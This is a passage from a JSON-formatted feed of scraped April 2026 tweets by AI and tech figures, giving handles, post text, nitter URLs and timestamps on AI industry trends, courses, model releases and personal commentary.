\n\nAdam Foroughi is top 5 I have ever met. Easily. \n\nAppLovin Market Cap: $160BN \n\nRevenue: $5.48BN \n\nEBITDA per Head: $10M\n\nThere is no company on the planet with numbers like AppLovin. \n\nEpisode coming 👇", + "url": "https://nitter.net/HarryStebbings/status/2046684883494600911#m", + "published_at": "2026-04-21T20:17:56+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱", + "url": "https://nitter.net/eladgil/status/2046674350993223784#m", + "published_at": "2026-04-21T19:36:05+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/", + "url": "https://nitter.net/ceo_clickhouse/status/2046673188193701901#m", + "published_at": "2026-04-21T19:31:28+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "AI for email++", + "url": "https://nitter.net/eladgil/status/2046640542218604783#m", + "published_at": "2026-04-21T17:21:44+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323\nclass at @Stanford today. Questions?", + "url": "https://nitter.net/saranormous/status/2046637828025835983#m", + "published_at": "2026-04-21T17:10:57+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: The future of computer vision is agentic.\n\n1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in structure, but weakly grounded in what's actually in the video.\n\nThis limitation shows up in cases like \"rolling stops\". Is the stop sign actually associated with the vehicle’s lane? Does the ego vehicle ever come to a full stop, or only decelerate?", + "url": "https://nitter.net/nomadicai/status/2046635685206208533#m", + "published_at": "2026-04-21T17:02:26+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have access to Google's Paper Assistant Tool (PAT) to help improve their submissions. \n\nThis program offers authors the opportunity to receive free, automated, and actionable feedback on their manuscripts before the final deadline, private to the authors. It is a completely optional service that is kept strictly private to the authors and will not be used in the review process.\n\nRead more in our blog post: https://blog.neurips.cc/2026/04/21/neurips-supports-authors-with-googles-paper-assistant-tool-pat/", + "url": "https://nitter.net/NeurIPSConf/status/2046632664493384060#m", + "published_at": "2026-04-21T16:50:26+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "In a world of agents, how do software providers prevent themselves from becoming valueless databases?\n\n\"The value proposition has to be:\n\n1. How good are your APIs?\n\n2. How well designed are they\n\n3. Are they ready for agents?\n\n4. Can you monetize that in some way?\n\nWe are treating software too much like one monolithic industry.\n\nThere's a lot of categories of software where agents using the tools is a massive boon for the technology as opposed to a dilemma.\" @levie\n\nLove to hear your thoughts on this @Benioff @dharmesh @mcannonbrookes @rauchg @mcuban", + "url": "https://nitter.net/HarryStebbings/status/2046614183513604299#m", + "published_at": "2026-04-21T15:37:00+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "🔥", + "url": "https://nitter.net/eladgil/status/2046375878368940239#m", + "published_at": "2026-04-20T23:50:03+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "What Role Does Not Exist Today But Will Be So Common in Five Years Time:\n\n\"500K-1M jobs will be created for agent operators.\n\nThis person will be somewhat technical. They will be deep in the AI world.\n\nThey're gonna have to understand MCPs and CLIs and they are going to have to know how to write skills.\n\nIt's going be this group of people that will know how to go into your marketing team or your legal team, or your operations team, or your life sciences research team and this is the person that is basically going to enable that function to get leverage from agents.\" @levie\n\nWhere is this right? Where is this wrong? @jasonlk @gregisenberg @amasad @AnjneyMidha", + "url": "https://nitter.net/HarryStebbings/status/2046353968973160675#m", + "published_at": "2026-04-20T22:23:00+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudNext. \nhttps://www.bloomberg.com/news/features/2026-04-20/google-eyes-new-chips-to-speed-up-ai-results-challenging-nvidia?srnd=undefined", + "url": "https://nitter.net/ThomasOrTK/status/2046344875994739028#m", + "published_at": "2026-04-20T21:46:52+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "TikTok follower growth and virality means nothing. \n\nViews and followers are essentially worth nothing. \n\nBut it is the best testing ground on the planet to try material before taking it to Instagram and YouTube.", + "url": "https://nitter.net/HarryStebbings/status/2046339832922689673#m", + "published_at": "2026-04-20T21:26:49+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: Link to fuller post:\nhttps://substack.com/home/post/p-194229552?source=queue", + "url": "https://nitter.net/eladgil/status/2046300649483374704#m", + "published_at": "2026-04-20T18:51:07+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Here is the sbstack version\n\n\"Random thoughts while gazing at the misty AI Frontier\"\n\nhttps://blog.eladgil.com/p/random-thoughts-while-gazing-at-the", + "url": "https://nitter.net/eladgil/status/2046284381439103043#m", + "published_at": "2026-04-20T17:46:29+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 13/12 Anti-AI regulation & violence will both increase\n\nIt is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively", + "url": "https://nitter.net/eladgil/status/2046284194943500453#m", + "published_at": "2026-04-20T17:45:44+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months", + "url": "https://nitter.net/eladgil/status/2046284191885922498#m", + "published_at": "2026-04-20T17:45:44+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product\n\nThis is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size of their seat based software counterparts", + "url": "https://nitter.net/eladgil/status/2046284190132609299#m", + "published_at": "2026-04-20T17:45:43+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 10/12 Harness creating more and more stickiness to models\n\nIf you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be increasingly sticky in the short term.\n\nIt is not just the model you use, but the environment, prompting, etc you build around it that helps impact your choice. Brand also matters more then many people think. At some point, either one coding model breaks very far ahead, or they stay neck in neck. How important is the harness/workflow long term for defensibility for coding or enterprise applications?", + "url": "https://nitter.net/eladgil/status/2046284188622737554#m", + "published_at": "2026-04-20T17:45:43+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies.\n\nDeep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in world of AI. Systems thinkers and product thinkers engineers happiest. Many people are a mix of both", + "url": "https://nitter.net/eladgil/status/2046284184877187540#m", + "published_at": "2026-04-20T17:45:42+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts.\nThis podcast though, his questions and narrative are very AGI Party takes, because I think they're very low-rank. That's my opinion.", + "url": "https://nitter.net/soumithchintala/status/2046282944139215141#m", + "published_at": "2026-04-20T17:40:46+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "The Jensen + @dwarkesh_sp podcast was fantastic. \nJensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense how AI will actually diffuse into the world.\nIn this podcast, Dwarkesh came off as someone who picked up talking points from an AGI party in the SF Mission District.\nAnd the contrast was so evident.\nAs someone who understood ecosystems relatively deepy, maybe I understood Jensen's take more than others did (idk).\n\nMythos, that Dwarkesh kept bringing up, is not a single absolute turning point in the AI development landscape. Take a state-of-the-art Chinese open-source model, and give it three orders of magnitude more test-time compute + post-training algorithmic advances that haven't been published yet. That's the baseline. It was evident that in whatever bubble Dwarkesh is in, that is seen as a naive or illogical baseline.\n\nWhen AI has such a complex development cycle, it's evident that America needs many levers of policy intervention across multiple layers in a dominant ecosystem that ideally the Western world controls.\n\nThe entire premise that a particular model with AI development will have a critical phase change is neither correct nor does evidence point to it. OpenAI made this point with GPT-4, Anthropic made this point with Mythos, but neither stood / will stand the test of time.\n\nI think Jensen's repeated emphasis within the podcast to try to make this point mostly didn't get Dwarkesh's attention. And Dwarkesh (in this podcast) represents an entire cult of AI researchers and decision-makers that are going to influence policy.\n\nThe thing with policy interventions is that if you do too much too early, you shoot yourself in the foot. There's a good reason American foreign policy and general sanctions of all kinds are measured and continuous.\n\nDespite Jensen's attempt at educating the \"Anthro\" audience how ecosystems work, I'm also not super hopeful a lot of people who've taken the extreme position will change their thought after listening to this podcast. I do think there's a certain religiousness that has permeated some of that community that would make it hard to understand ecosystems at a deeper level.", + "url": "https://nitter.net/soumithchintala/status/2046265830908870983#m", + "published_at": "2026-04-20T16:32:46+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Here's a crisp summary by @EconChrisClarke of some of the key findings of our Canaries in the Coal Mine, the counter arguments, the counter-counter arguments and the complementary research by others. @BharatKChandar @RuyuChen", + "url": "https://nitter.net/erikbryn/status/2046244291945927102#m", + "published_at": "2026-04-20T15:07:11+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: One union spends more on political contributions in Washington than the entire tech industry.", + "url": "https://nitter.net/pmddomingos/status/2046063371951464753#m", + "published_at": "2026-04-20T03:08:16+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "R to @erikbryn: Here's the course:\n\nhttps://www.masterclass.com/classes/revolutionize-your-workflows-with-ai", + "url": "https://nitter.net/erikbryn/status/2045586582879764872#m", + "published_at": "2026-04-18T19:33:41+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "AI should have been named IA.\n\nMillions more people would have embraced it to boost their everyday performance.\n\nIt's something I discuss in my new @MasterClass", + "url": "https://nitter.net/erikbryn/status/2045586493494989066#m", + "published_at": "2026-04-18T19:33:19+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: CATER DIAMOND YOU ARE NOT SAFE AROUND ME", + "url": "https://nitter.net/jankacest/status/2045310986412781730#m", + "published_at": "2026-04-18T01:18:33+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: The Universal High Income Power Map\n\nft. @elonmusk, @AndrewYang, @erikbryn", + "url": "https://nitter.net/ADINresearch/status/2045223340420272212#m", + "published_at": "2026-04-17T19:30:17+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: 🤤", + "url": "https://nitter.net/jankacest/status/2045223202381508777#m", + "published_at": "2026-04-17T19:29:44+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "You cannot believe how much intrinsic knowledge GPT-5.4 has about building GPU compute kernels. I honestly think this will materially impact NVIDIA's lead in software.", + "url": "https://nitter.net/liuliu/status/2045210034813186142#m", + "published_at": "2026-04-17T18:37:25+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: AI assistants don’t just answer questions anymore; they jump in with suggestions. Does this generally improve worker's quality of output or hurt it? How do these effects vary by experience level? Join @mattbeane next week at @DigEconLab to learn more: https://digitaleconomy.stanford.edu/event/matt-beane-del-seminar-series-2/", + "url": "https://nitter.net/StanfordHAI/status/2045201392739205391#m", + "published_at": "2026-04-17T18:03:04+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "AI can power small teams to boost output, write @saraheneedleman in @BusinessInsider.\n\nhttps://africa.businessinsider.com/careers/snaps-layoffs-highlight-growing-work-trend-ai-powered-tiny-teams/xw8stkt\n\nHere's my quote:\n\n\"The winners won't simply be the leanest organizations,\" [Brynjolfsson] said. \"They'll be the ones that best redesign work so humans and AI complement each other.\"", + "url": "https://nitter.net/erikbryn/status/2044943654486462558#m", + "published_at": "2026-04-17T00:58:55+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "M4 is faster (since a few days ago): https://engineering.drawthings.ai/p/making-apple-neural-engine-work-in", + "url": "https://nitter.net/liuliu/status/2044865239532163122#m", + "published_at": "2026-04-16T19:47:19+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "R to @liuliu: Image", + "url": "https://nitter.net/liuliu/status/2044827486220111890#m", + "published_at": "2026-04-16T17:17:18+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Hold my beer:", + "url": "https://nitter.net/liuliu/status/2044827484823412831#m", + "published_at": "2026-04-16T17:17:18+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "R to @erikbryn: Here's the course:\n\nhttps://www.masterclass.com/classes/revolutionize-your-workflows-with-ai", + "url": "https://nitter.net/erikbryn/status/2044816749720432652#m", + "published_at": "2026-04-16T16:34:38+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Most people are only getting a fraction of the value they could be getting from AI tools. It's a huge \"capabilities overhang\".\n\nAlong with the amazing Cat Goetze and Parth Patil, I've created a @MasterClass that quickly shows you how to operate at the scale of a small team with a set of easy-to-use AI tools.\n\nCheck out the link below.", + "url": "https://nitter.net/erikbryn/status/2044816389521969353#m", + "published_at": "2026-04-16T16:33:12+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: What a pleasant surprise to see the former Prime Minister of #UK (@RishiSunak) post about the @Stanford paper on Enterprise #AI I co-authored. 💡\n\n@erikbryn @elisacmpereira1 @DigEconLab #FutureofWork @StanfordHAI", + "url": "https://nitter.net/AGraylin/status/2044570504577855699#m", + "published_at": "2026-04-16T00:16:09+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Very excited to share that our project was selected as a @LaudeInstitute Moonshots seed grant winner on workforce upskilling @tatsu_hashimoto @erikbryn \n\nThis is something I think about a lot these days. With so much uncertainty about AI and jobs today, I'm deeply motivated by this question of how can we use LLMs not to replace people, but to empower them...", + "url": "https://nitter.net/Diyi_Yang/status/2044513911484125496#m", + "published_at": "2026-04-15T20:31:16+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It was a delight to serve on the selection committee with an awesome group of committee members. We had lots of great submissions to evaluate and excellent discussions during our selection process.\n\nYou can see the selected proposals below and learn more at http://laude.org/moonshots", + "url": "https://nitter.net/JeffDean/status/2044509365164773818#m", + "published_at": "2026-04-15T20:13:12+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: “Collaborative Intelligence for the Future of Work” from Lab Director @erikbryn, @tatsu_hashimoto and @Diyi_Yang has an ambitious plan for policymakers, workers and institutions to get ahead of AI’s disruption of labor.\n\nhttps://www.laude.org/moonshots/one/collaborative-intelligence-future-of-work", + "url": "https://nitter.net/DigEconLab/status/2044486951290716635#m", + "published_at": "2026-04-15T18:44:08+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Workforce Reskilling track: Research that helps people adapt to labor market shifts through retraining, upskilling, and lifelong learning.\n\n🤖Collaborative Intelligence for the Future of Work, @Stanford\nWhat does it actually mean to augment workers rather than replace them? This team is running the trials to find out.\n@erikbryn @tatsu_hashimoto @Diyi_Yang \n\n🤲ARISTOS: Reskilling for a Physical Workforce, @CarnegieMellon\nDexterous physical work is one of the last things AI can't simply automate. This team is building an AI craft master that teaches it on demand.\n@RamananDeva @ChangliuL Raj Reddy Katia Sycara @junyanz89", + "url": "https://nitter.net/LaudeInstitute/status/2044468446696731011#m", + "published_at": "2026-04-15T17:30:36+00:00" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "New course: Spec-Driven Development with Coding Agents, built in partnership with @jetbrains, and taught by @paulweveritt.\n\nVibe coding is fast, but often produces code that doesn't match what you asked for. This short course teaches you spec-driven development: write a detailed spec defining what to build, and work with your coding agent to implement it. Many of the best developers already build this way.\n\nA spec lets you control large code changes with a few words, preserve context across agent sessions, and stay in control as your project grows in complexity.\n\nSkills you'll gain:\n- Write a detailed specification to define your mission, tech stack, and roadmap, giving your agent the context it needs from the start\n- Plan, implement, and validate features in iterative loops using a spec as your agent's guide\n- Apply the same repeatable workflow to both new and legacy codebases\n- Package your workflow into a portable agent skill that works across agents and IDEs\n\nJoin and write specs that keep your coding agent on track!\nhttps://www.deeplearning.ai/short-courses/spec-driven-development", + "url": "https://nitter.net/AndrewYNg/status/2044449830605582629#m", + "published_at": "2026-04-15T16:16:38+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: In case it's not clear, you can click on the picture in the first image to learn more about Ricardo and the award: Twitter swallowed my actual link text to https://awards.acm.org/about/2025-barroso to turn it into the picture, I guess.", + "url": "https://nitter.net/JeffDean/status/2044449033490760085#m", + "published_at": "2026-04-15T16:13:28+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "Delighted to see that Ricardo Baeza-Yates (@PolarBearby) is this year's winner of the @TheOfficialACM Luiz Barroso Award (an award named in honor of my longtime Google colleague).\n\nRicardo is widely regarded as one of the world’s foremost researchers in information retrieval, and many of you may have read is excellent textbook Modern Information Retrieval (co-authored with Berthier Ribeiro-Neto). He has also played a pivotal role in strengthening the Latin American computing community.\n\nRicardo's accomplishments and selection would make Luiz proud!\n\nhttps://awards.acm.org/about/2025-barroso", + "url": "https://nitter.net/JeffDean/status/2044448743811129716#m", + "published_at": "2026-04-15T16:12:19+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Introducing Gemini 3.1 Flash TTS 🗣️, our latest text to speech model with scene direction, speaker level specificity, audio tags, more natural + expressive voices, and support for 70 different languages.\n\nAvailable via our new audio playground in AI Studio and in the Gemini API!", + "url": "https://nitter.net/OfficialLoganK/status/2044447596010435054#m", + "published_at": "2026-04-15T16:07:45+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Truth, love, and beauty are all pursued for their own sake, even if they make us worse off.", + "url": "https://nitter.net/naval/status/2044234462972784792#m", + "published_at": "2026-04-15T02:00:50+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Apparently, this continues for M5 users too.", + "url": "https://nitter.net/liuliu/status/2044111782839759304#m", + "published_at": "2026-04-14T17:53:21+00:00" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "I'm excited about voice as a UI layer for existing visual applications — where speech and screen update together. This goes well beyond voice-only use cases like call center automation.\n\nThe barrier has been a hard technical tradeoff: low-latency voice models lack reliability, while agentic pipelines (speech-to-text → LLM → text-to-speech) are intelligent but too slow for conversation. Ashwyn Sharma and team at Vocal Bridge (an AI Fund portfolio company) address this with a dual-agent architecture: a foreground agent for real-time conversation, a background agent for reasoning, guardrails, and tool calls.\n\nI used Vocal Bridge to add voice to a math-quiz app I'd built for my daughter; this took less than an hour with Claude Code. She speaks her answers, the app responds verbally and updates the questions and animations on screen.\n\nOnly a tiny fraction of developers have ever built a voice app. If you'd like to try building one, check out Vocal Bridge for free: https://vocalbridgeai.com", + "url": "https://nitter.net/AndrewYNg/status/2044088884989177991#m", + "published_at": "2026-04-14T16:22:22+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: We’re rolling out an upgrade designed to help robots reason about the physical world. 🤖\n\nGemini Robotics-ER 1.6 has significantly better visual and spatial understanding in order to plan and complete more useful tasks. Here’s why this is important 🧵", + "url": "https://nitter.net/GoogleDeepMind/status/2044069878781390929#m", + "published_at": "2026-04-14T15:06:50+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "See data on the net flow of AI authors and inventors and thousands of other insights in the #AIIndex2026, released today.", + "url": "https://nitter.net/erikbryn/status/2043798774699683995#m", + "published_at": "2026-04-13T21:09:34+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "Just like us at @thinkymachines, @luke_drago_ @LRudL_ care a lot about amplifying humans, not replacing them.\nThey're joining us to build towards that future!", + "url": "https://nitter.net/soumithchintala/status/2043752413085966574#m", + "published_at": "2026-04-13T18:05:21+00:00" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "As AI agents accelerate coding, what is the future of software engineering? Some trends are clear, such as the Product Management Bottleneck, referring to the idea that we are more constrained by deciding what to build rather than the actual building. But many implications, like AI’s impact on the job market, how software teams will be organized, and more, are still being sorted out.\n\nThe theme of our AI Developer Conference on April 28-29 in San Francisco is The Future of Software Engineering. I look forward to speaking about this topic there, hearing from other speakers on this theme, and chatting with attendees about it. We’re shaping the future, and I hope you will join me there!\n\nIt is currently trendy in some technology and policy circles to forecast massive job losses due to AI. Even if they have not yet materialized, these losses certainly must be just over the horizon! I have a contrarian view that the AI jobpocalypse — the notion that AI will lead to massive unemployment, perhaps even rioting in the streets — won’t be nearly as bad as dire forecasts by pundits, especially pundits who are trying to paint a picture of how powerful their AI technology is.\n\nAmong professions, AI is accelerating software engineering most, given the rise of coding agents. According to a new report by Citadel Research, software engineering job postings are rising rapidly. So if software engineering is a harbinger of the impact AI will have on other professions, this expansion of software engineering jobs is encouraging.\n\nYes, fresh college graduates are having a hard time finding jobs. And yes, there have been layoffs that CEOs have attributed to AI, even if a large fraction of this was “AI washing,” where businesses choose to attribute layoffs to AI, even though AI has not changed their internal operations much yet. And yes, there is a subset of job roles, such as call center operator, that are more heavily impacted. Many people are feeling significant job insecurity, and I feel for everyone struggling with employment, whether or not the cause is AI-related. And many other factors, such as over-hiring during the pandemic and high interest rates, have contributed to the slowdown in the labor market, and the notion that AI is leading to unemployment is oversimplified.\n\nIn software engineering, I see a lot of exciting work ahead to adapt our workflows. It is already clear that: (i) As AI makes coding easier, a lot more people will be doing it. (ii) Writing code by hand and even reading (generated) code is not that important, because we can ask an LLM about the code and operate at a higher level than the raw syntax (although how high we can or should go is rapidly changing). (iii) There will be a lot more custom applications, because now it’s economical to write software for smaller and smaller audiences. (iv) Deciding what to build, more than the actual building, is becoming a bottleneck. (v) The cost of paying down technical debt is decreasing (since AI can refactor for you).\n\nAt the same time, there are also a lot of open questions for our profession, such as:\n- In the future, what will be the key skills of a senior software engineer? And for junior levels, what should be the new Computer Science curriculum?\n- If everyone can build features, what skills, strategies, or resources create competitive advantage for individuals and for businesses?\n- What are the new building blocks (libraries, SDKs, etc.) of software? How do we organize coding agents to create software?\n- What should a software team look like? For example, how many engineers, product managers, designers, and so on. What tooling do we need to manage their workflow?\n- How do AI agents change the workflow of machine learning engineers and data scientists? For example, how can we use agents to accelerate exploring data, identifying hypotheses, and testing them?\n\nI’m excited to explore these and other questions about the future of software engineering at AI Dev. I expect this to be an exciting event. Please join us!\n\n[Original text: The Batch newsletter.]\n\nhttps://ai-dev.deeplearning.ai/", + "url": "https://nitter.net/AndrewYNg/status/2043742105852621052#m", + "published_at": "2026-04-13T17:24:23+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Dean Pomerleau was working on self-driving cars decades before Teslas and Waymos hit the streets.\n\n@tommmitchell dives into the surprising early history of autonomous driving in the latest episode of Machine Learning: How Did We Get Here?\n\nWatch here: https://www.youtube.com/watch?v=q-lRgHGiIMQ", + "url": "https://nitter.net/DigEconLab/status/2043730014798225488#m", + "published_at": "2026-04-13T16:36:20+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: $200/month is enough to buy an H100 GPU for 6 hours every workday", + "url": "https://nitter.net/ekzhang1/status/2043562453452128359#m", + "published_at": "2026-04-13T05:30:31+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Artemis II astronaut Victor Glover received a hero's welcome from his neighbors! 🇺🇸", + "url": "https://nitter.net/OwenSparks/status/2043477332438958253#m", + "published_at": "2026-04-12T23:52:16+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Download to double your FLOPs on your M4s.", + "url": "https://nitter.net/liuliu/status/2043041062265196703#m", + "published_at": "2026-04-11T18:58:41+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Discretionary traders should think carefully about instrument selection\n\nAs in spot vs spot margin vs perps vs options and combinations therein\n\nThe obvious components are cost, liquidity, and capital efficiency. The non-obvious components are drawdown tolerance, volatility tolerance, and trade management.\n\nFrom personal experience:\n\nPerps are excellent for intraday trading, but for swing trading and larger bets my performance was worse because I would over-manage those positions and be much more sensitive to drawdowns etc.\n\nSpot/spot margin are great for larger bets and higher time frame swing trades. I'd find myself less concerned with the tick-by-tick movements so I could actually hold the trade, but whenever I've tried to LTF trade those instruments, I would get complacent with trade management.\n\nThe tempting default answer is perps for liquidity + to size up, but your bigger position isn't helpful if it means you sabotage yourself by managing it poorly\n\nI'm certain that you can think of trades that were great ideas but poorly executed - instrument selection may be the culprit", + "url": "https://nitter.net/CryptoCred/status/2042967332952101173#m", + "published_at": "2026-04-11T14:05:43+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: OpenAI is nothing without its people https://geohot.github.io//blog/jekyll/update/2026/04/11/openai-people.html", + "url": "https://nitter.net/geohotarchive/status/2042804258584580211#m", + "published_at": "2026-04-11T03:17:43+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Yet another inspiration to women in STEM.\n\nChristina Koch is her name🌑", + "url": "https://nitter.net/Ms_Dhaey/status/2042762001873502676#m", + "published_at": "2026-04-11T00:29:48+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: I spoke out about the Colorado law last year. Given the threat to freedom of speech, all conservatives should be able to support this challenge, even if they have other concerns about AI.", + "url": "https://nitter.net/DavidSacks/status/2042391709129326829#m", + "published_at": "2026-04-09T23:58:23+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Kudos to @xAI for being the first AI company to challenge a Colorado law requiring it to censor truthful answers if they could have a “differential impact” on protected groups. This is Woke AI. It teaches AI models to lie. And it’s a violation of the First Amendment.", + "url": "https://nitter.net/DavidSacks/status/2042390626436792399#m", + "published_at": "2026-04-09T23:54:05+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: We’ve redesigned our docs with easy access to SDK reference, tutorials, support, and our newly updated cookbook---v0.3.0!\n\nWhether you’re writing your first training loop in Tinker or debugging async RL, we want to make it easier to find what you need.", + "url": "https://nitter.net/tinkerapi/status/2042330088130441337#m", + "published_at": "2026-04-09T19:53:32+00:00" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "New course: Efficient Inference with SGLang: Text and Image Generation, built in partnership with LMSys @lmsysorg and RadixArk @radixark, and taught by Richard Chen @richardczl, a Member of Technical Staff at RadixArk.\n\nRunning LLMs in production is expensive, and much of that cost comes from redundant computation. This short course teaches you to eliminate that waste using SGLang, an open-source inference framework that caches computation already done and reuses it across future requests.\n\nWhen ten users share the same system prompt, SGLang processes it once, not ten times. The speedups compound quickly, especially when there's a lot of shared context across requests.\n\nSkills you'll gain:\n- Implement a KV cache from scratch to eliminate redundant computation within a single request\n- Scale caching across users and requests with RadixAttention, so shared context is only processed once\n- Accelerate image generation with diffusion models using SGLang's caching and multi-GPU parallelism\n\nJoin and learn to make LLM inference faster and more cost-efficient at scale!\nhttps://www.deeplearning.ai/short-courses/efficient-inference-with-sglang-text-and-image-generation", + "url": "https://nitter.net/AndrewYNg/status/2042289428702642588#m", + "published_at": 